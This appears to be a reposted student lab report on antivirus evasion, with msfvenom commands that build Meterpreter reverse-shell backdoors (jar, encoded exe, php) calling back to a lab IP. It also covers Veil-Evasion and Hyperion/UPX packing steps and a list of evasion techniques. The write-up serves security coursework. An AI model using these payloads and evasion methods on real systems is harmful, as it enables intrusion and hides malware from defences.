20164305 徐广皓 Exp3 免杀原理与实践

最新推荐文章于 2024-11-10 15:23:02 发布
最新推荐文章于 2024-11-10 15:23:02 发布
阅读量122 收藏
点赞数
文章标签: php java 操作系统
原文链接:http://www.cnblogs.com/zui-luo/p/10632732.html
版权
  • 免杀原理及基础问题回答
  • 实验内容
    • 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
      • 使用msf编码器生成各种后门程序及检测
      • 使用veil-evasion生成后门程序及检测
      • 半手工注入Shellcode并执行
    • 任务二:通过组合应用各种技术实现恶意代码免杀
    • 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

一、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1. msfvenom生成.jar文件
  • 生成java后门程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar
  • 扫描结果如下

2. msfvenom生成.exe文件
  • 与实验二相同,生成一次编码(端口号做实验的时候打错了o(╥﹏╥)o)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe

  • 查杀结果:

  • 十次编码使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe

  • 查杀结果

3. msfvenom生成php文件
  • 生成PHP命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php
  • 查杀结果

4. 使用veil-evasion生成后门程序及检测
安装veil
1 sudo apt-get install veil
2 sudo apt-get upgrade veil

  • 然后我遇到群里出现的问题,也尝试了多次更新但是也没效果(如下图)

  • 这个问题实际上只需要请将Autolt3文件夹从Programe Files (x86)下移动到Programe Files文件夹下就可以解决。

使用veil

  • 打开veil,veil

  • use evasion命令进入Evil-Evasion

  • 进入配置界面,use c/meterpreter/rev_tcp.py

  • 输入generate生成文件,接着输入你想要playload名称

  • 然后去查杀,结果。。。肯定不行

5. 半手工注入Shellcode并执行
  • 这部分我在实验2中就已经做过,详情请见链接。、

  • 查杀结果

 

6.加壳自制后门
  • 压缩壳

 

  • 加密壳 
    1 /usr/share/windows-binaries/hyperion/
2 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe

任务二:通过组合应用各种技术实现恶意代码免杀

由于懒惰,做本次试验拖了几天,看到很多同学都达到了实验报告中免杀的要求,于是我就按部分同学的制作思路,复现了一下,发现没有成功,具体情况如下

  • 我看到了有同学说利用手工shellcode、加密壳和压缩壳实现了免杀,于是我用helloworld的代码试验了一下
  • 先编写一个helloworld,然后对其编译生成的exe文件进行压缩、加密、加密压缩的操作

  • 然后在主机运行360的情况下,将这些exe文件都拷贝到主机上,发现

  • 哦看起来只有压缩壳没啥问题,然后我又把压缩壳放到了网站上查杀了一下

  • 虽然还没结束,但这报毒率比真正有毒的PHP文件都高。。。。。
  • 那么问题来了,是我用的壳不对吗?然后我又看到有的同学说先用py生成shellcode然后用加密壳就没有被查杀,我有复现了一遍,结果跟前面实验一样。。。。。
  • 那看来要不就是我的360太强了,要不就是我的壳有问题。。。。。
  • 还有一个问题,我在运行不加壳的c代码,360就自动给我杀了。。。。
  • 所以希望有利用半手工shellcode和壳做出免杀程序的同学可以私聊我,教我一下是怎么做出来的(瞻仰大佬)Thanks♪(・ω・)ノ

 

实验总结与体会

 

  • 实验感想

    不管是通过什么方法,只要用加密壳就一定被杀,只要用反弹连接就会生成meterpreter文件也会被杀,所以只是改变编码顺序并不能避免被杀,真心希望前面做出来的同学教我一下如何被免杀。

  • 杀软是如何检测出恶意代码的?

    • 基于特征码
    • 实时监控
    • 基于行为的恶意软件检测

  • 免杀是做什么?

    可以实现杀毒软件不发现、扫描不出病毒代码。

  • 免杀的基本方法有哪些

    • 改变特征码
      • 加壳
      • shellcode+encoder
      • veil-evasion
      • 半手工化
    • 改变行为
      • 通讯方式
        • 尽量使用反弹式连接
        • 使用隧道技术
        • 加密通讯数据
      • 操作系统
        • 基于内存操作
        • 减少对系统的修改
        • 加入混淆作用的正常功能代码

  • 开启杀软能绝对防止电脑中恶意代码吗

    那一定是防不住的,杀毒软件是被动的防护方式,只有恶意代码的更新才会促进杀软的升级

 

转载于:https://www.cnblogs.com/zui-luo/p/10632732.html

diangaolu4138
关注
徐家恺通信原理教程(第二版)答案
03-22
这是徐家恺的通信原理教程(第二版)的教材答案,希望对广大读者有所帮助Fw 02 000L 2-2 0大运傅原粒高计等,计移用列 t 4 C 2-t(某中=爷) wat T)% t n n n hw.c n C n w N风t (4则 270 长 )P面...
python/meterpreter/rev_tcp 的监听
cong86的博客
08-07 1234
python/meterpreter/rev_tcp 的监听  ip地址的设置: 1)、使用桥接模式,打开VM 的“虚拟机”点击设置查看网络设置是不是桥接模式,如图所示       2)手动设置静态ip地址,这里要与主机ip地址在同一网段,不然到后面监听不到,因为我的windows的ip地址如图所示:       3)、然后看一下能不能ping通,ping通后开始实验 (如果
《数据库原理与技术实验》教学大纲.docx
12-14
《数据库原理与技术实验》教学大纲旨在帮助物联网工程专业的学生深入理解和掌握数据库系统的基本理论、技术和应用。这门课程作为专业核心课,是学生未来从事信息技术工作的重要基础。课程目标主要包括: 1. 系统地...
编译原理实践附录B
11-24
《编译原理实践附录B》涉及到的知识点主要集中在编译器的构造与实现上,这是一门涉及计算机科学核心领域的技术。编译器是将高级编程语言转换为机器可执行代码的关键工具,它的设计和实现对于软件工程至关重要。在...
计算机组织与结构(计算机组成原理).rar
07-11
本资源为计算机组织与结构(计算机组成原理),包括理论部分和实验部分,理论部分包括考研408教材,南昌大学教材习题部分答案,南昌大学计组专用教材(内涵部分习题解答),实用性还是挺强的。实验部分包括南昌大学...
【神经科学学习笔记】基于分层嵌套谱分割(Nested Spectral Partition)模型分析大脑网络整合与分离的学习总结
Rose9614的博客
11-06 1294
需要说明的是,本文仅是笔者对NSP方法的初步尝试,主要聚焦于功能连接网络的分析。原文中还包含了结构连接网络的分析,以及功能-结构整合的深入探讨,这些都为理解大脑的组织原理提供了更全面的视角。感兴趣的小伙伴强烈建议去阅读原文~笔者也准备明天有时间再尝试计算一下局部指标。
[vulnhub] DarkHole: 1
weixin_46099552的博客
11-08 719
vulnhub - DarkHole: 1
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1038
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
yum安装zabbix5.0升级php到74的办法
hxiang613的专栏
11-08 516
难题也跟来了,php是和zabbix绑定的,卸载了rh-php72就会使得zabbix前端的相关的包不可使用,不可卸载rh-php72。当前yum安装的方式,php和zabbix耦合性太高,升级的方式可以保留数据库不动,重新编译安装zabbix,然后引用原来的数据库。将zabbix,php,http,db全部分离。公司时不时有扫描漏洞,之前发现了php漏洞,因开启防火墙,限定IP+端口,暂时躲过升级;现在,老话重提,开启了KPI考核,躲是躲不过去的了,升级吧。停止原先的zabbix服务及相关组件。
[FBCTF 2019]rceservice 详细题解
weixin_73904941的博客
11-09 1137
如果在字符串最末尾的 } 之前加上一个%0a {%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}此时 \x00-\x1F 匹配了第一个%0a 但是最后的.* 不能匹配换行符,也匹配不到换行后的 }所以不能遍历完整字符串,返回值为空,完成正则绕过//而在单行模式下$ 似乎会忽略在句尾的 %0a 所以如果%0a 添加在字符串最后的} 的后面的话依然会被匹配构造?
第11章 LAMP架构企业实战
lihuhelihu的博客
11-06 965
随着开源潮流的蓬勃发展,开放源代码的LAMP已经与J2EE和.Net商业软件形成三足鼎立之势,并且该软件开发的项目在软件方面的投资成本较低,因此受到整个IT界的关注。LAMP架构受到大多数中小企业的运维、DBA、程序员的青睐,Apache默认只能发布静态网页,而LAMP组合可以发布静态+PHP动态页面。静态页面通常指不与数据库发生交互的页面,是一种基于w3c规范的一种网页书写格式,是一种统一协议语言,所以称之为静态网页。
华为eNSP:mux-vlan
nankon_的博客
11-06 1213
一、什么是mux-vlan? Mux-vlan 是一种多路复用的虚拟局域网(Virtual Local Area Network)技术。它将多个不同的VLAN流量转发到同一个物理端口,从而实现VLAN间的互通。 在传统的以太网环境中,每个VLAN通常都有一个独立的物理接口来传输其数据。而在mux-vlan中,一个物理接口可以同时承载多个VLAN的数据流量。这种技术可以帮助节省网络设备的物理接口,降低网络成本。 mux-vlan通过使用VLAN标签来区分不同的网络流量。当数据包到达交换机时,交换机根据数
华为eNSP实验:IP Source Guard
liu19307650129的博客
11-06 652
S1]user-bind static ip-address 10.1.1.10 mac-address 5489-9863-7DD2 //配置PC2静态用户绑定。[S1-Ethernet0/0/1]interface e0/0/2 //使能E0/0/2接口IPSG和IP报文检查告警功能。[S1]interface e0/0/1 //使能E0/0/1接口IPSG和IP报文检查告警功能。
yii 常用一些调用
weixin_39289004的博客
11-06 474
yii 常用一些调用 (增加中) 调用YII框架中 jquery:Yii::app()->clientScript->registerCoreScript(‘jquery’); framework/web/js/source的js,其中registerCoreScript key调用的文件在framework/web/js/packages.php列表中可以查看 在view中得到当前c...
PHP弱类型安全问题
sheji888的专栏
11-07 621
PHP弱类型安全问题主要源于PHP语言的弱类型特性,这种特性允许变量在不同类型之间自由转换,并在比较时进行自动的类型转换。
攻防世界35-easyupload-CTFWeb
最新发布
LH1013886337的博客
11-10 71
这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。这两个设置的区别只是在于auto_prepend_file是在文件前插入,auto_append_file在文件最后插入。上传名称后缀为.phtml .phps .php5 .pht等(可以自行FUZZ测试,自己找字典)所以本题我们要想上传并且执行,首先上传.user.ini文件,然后上传一个图片。
群控系统服务端开发模式-应用开发-个人资料
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
11-06 439
群控系统服务端开发模式-应用开发-个人资料
《网络是怎样连接的》学习总结-第五章
huiaixing的博客
11-06 1163
从输入URL到请求返回发生了什么?本章作者介绍了进入公司内网之前需要经过的一些服务器,比如CDN、ALB、NLB、负载均衡等等,这些概念在实际工作中用到很多,大家一起学起来!
林昊著作引领:OSGi原理实践精华
"OSGi原理与最佳实践_精选版"是一本由林昊曾宪杰编著的专业书籍,旨在引领国内对OSGi技术的研究和推广。OSGi(Open Services Gateway Initiative)是一个开源框架,特别适用于构建模块化、动态加载和高度可扩展的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值